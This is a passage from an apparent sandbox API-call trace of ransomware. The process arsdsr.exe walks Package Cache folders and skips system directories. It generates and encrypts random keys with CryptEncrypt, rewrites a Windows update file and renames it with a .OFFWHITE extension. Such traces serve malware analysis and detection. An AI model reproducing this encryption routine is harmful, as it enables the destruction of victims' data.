returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$recycle.bin") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="rsa") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ntuser.dat") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="programdata") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="appdata") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="program files") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="program files (x86)") returned 1 [0147.655] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\" [0147.655] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="Windows6.1-KB2999226-x64.msu" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0147.655] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.655] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.655] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x64.msu") returned=".msu" [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".exe") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".log") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".cab") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".cmd") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".com") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".cpl") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".ini") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".url") returned -1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".ttf") returned -1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".mp3") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".pif") returned -1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".mp4") returned 1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".OFFWHITE") returned -1 [0147.655] lstrcmpiW (lpString1=".msu", lpString2=".msi") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0147.655] GetProcessHeap () returned 0x500000 [0147.656] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d58 [0147.656] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0147.657] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=1012025) returned 1 [0147.657] GetProcessHeap () returned 0x500000 [0147.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.657] GetProcessHeap () returned 0x500000 [0147.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.657] GetProcessHeap () returned 0x500000 [0147.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.657] GetProcessHeap () returned 0x500000 [0147.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.657] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.657] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.657] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.657] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.657] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.657] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.658] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.658] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.658] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.658] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xf7139, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.658] SetLastError (dwErrCode=0x0) [0147.658] WriteFile (in: hFile=0x1e4, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0147.665] GetLastError () returned 0x0 [0147.665] GetLastError () returned 0x0 [0147.665] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xf7239, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.665] WriteFile (in: hFile=0x1e4, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0147.665] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xf7339, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.665] WriteFile (in: hFile=0x1e4, lpBuffer=0x526d58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x526d58*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0147.665] GetProcessHeap () returned 0x500000 [0147.666] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf7139) returned 0x2a60020 [0147.666] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.666] ReadFile (in: hFile=0x1e4, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xf7139, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295cb40*=0xf7139, lpOverlapped=0x0) returned 1 [0148.028] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.028] WriteFile (in: hFile=0x1e4, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xf7139, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295cb4c*=0xf7139, lpOverlapped=0x0) returned 1 [0148.031] GetProcessHeap () returned 0x500000 [0148.031] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0148.036] CloseHandle (hObject=0x1e4) returned 1 [0148.036] GetProcessHeap () returned 0x500000 [0148.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0148.037] GetProcessHeap () returned 0x500000 [0148.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0148.037] GetProcessHeap () returned 0x500000 [0148.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0148.037] GetProcessHeap () returned 0x500000 [0148.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0148.037] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" [0148.037] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE" [0148.037] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.offwhite")) returned 1 [0148.038] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0148.038] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0148.038] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="x64", cAlternateFileName="")) returned 0 [0148.038] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.038] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="Patch", cAlternateFileName="")) returned 0 [0148.038] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.038] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.038] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.038] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="...") returned 1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="windows") returned -1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="$recycle.bin") returned 1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="rsa") returned -1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="ntuser.dat") returned -1 [0148.038] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="programdata") returned -1 [0148.039] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="appdata") returned -1 [0148.039] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="program files") returned -1 [0148.039] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="program files (x86)") returned -1 [0148.039] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.039] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0148.039] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\" [0148.039] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\" [0148.039] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" [0148.039] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.040] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.040] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.040] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.040] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.040] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.040] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.041] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.041] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\" [0148.041] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0148.041] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\" [0148.041] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\" [0148.041] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" [0148.041] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.041] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.041] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.041] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.041] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="Patch", cAlternateFileName="")) returned 1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2=".") returned 1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2="..") returned 1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2="...") returned 1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2="windows") returned -1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2="$recycle.bin") returned 1 [0148.041] lstrcmpiW (lpString1="Patch", lpString2="rsa") returned -1 [0148.042] lstrcmpiW (lpString1="Patch", lpString2="ntuser.dat") returned 1 [0148.042] lstrcmpiW (lpString1="Patch", lpString2="programdata") returned -1 [0148.042] lstrcmpiW (lpString1="Patch", lpString2="appdata") returned 1 [0148.042] lstrcmpiW (lpString1="Patch", lpString2="program files") returned -1 [0148.042] lstrcmpiW (lpString1="Patch", lpString2="program files (x86)") returned -1 [0148.042] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\" [0148.042] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\", lpString2="Patch" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0148.042] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\" [0148.042] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\" [0148.042] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" [0148.042] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.045] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.045] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, 